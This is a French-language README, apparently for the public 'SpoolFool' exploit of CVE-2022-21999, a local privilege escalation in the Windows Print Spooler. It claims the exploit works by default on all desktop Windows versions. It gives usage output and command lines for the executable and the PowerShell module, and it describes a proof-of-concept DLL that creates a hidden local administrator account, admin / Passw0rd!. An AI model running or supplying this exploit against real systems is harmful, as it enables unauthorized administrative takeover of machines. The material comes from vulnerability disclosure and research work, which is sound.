
Exploit pour CVE-2022-21999 - Vulnérabilité d'élévation de privilèges du spouleur d'impression Windows (LPE)
Exploit pour CVE-2022-21999 - Vulnérabilité d'élévation de privilèges du service Print Spooler de Windows (LPE)
L'exploit fourni devrait fonctionner par défaut sur toutes les versions de bureau de Windows.
Veuillez consulter l'article de blog pour les détails techniques complets ici.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
La preuve de concept suivante utilise une DLL qui crée un nouvel administrateur local admin / Passw0rd!. La DLL (AddUser.dll) et le code source se trouvent dans ce dépôt.

Deuxième exécution
La preuve de concept suivante illustre une deuxième exécution de l'exploit fourni. Notez que la vulnérabilité n'est pas exploitée cette fois-ci afin de charger la DLL.

Après l'exécution de l'exploit, les artefacts suivants seront laissés pour un nettoyage ultérieur :
SpoolDirectory de l'imprimante ciblée n'est pas restaurée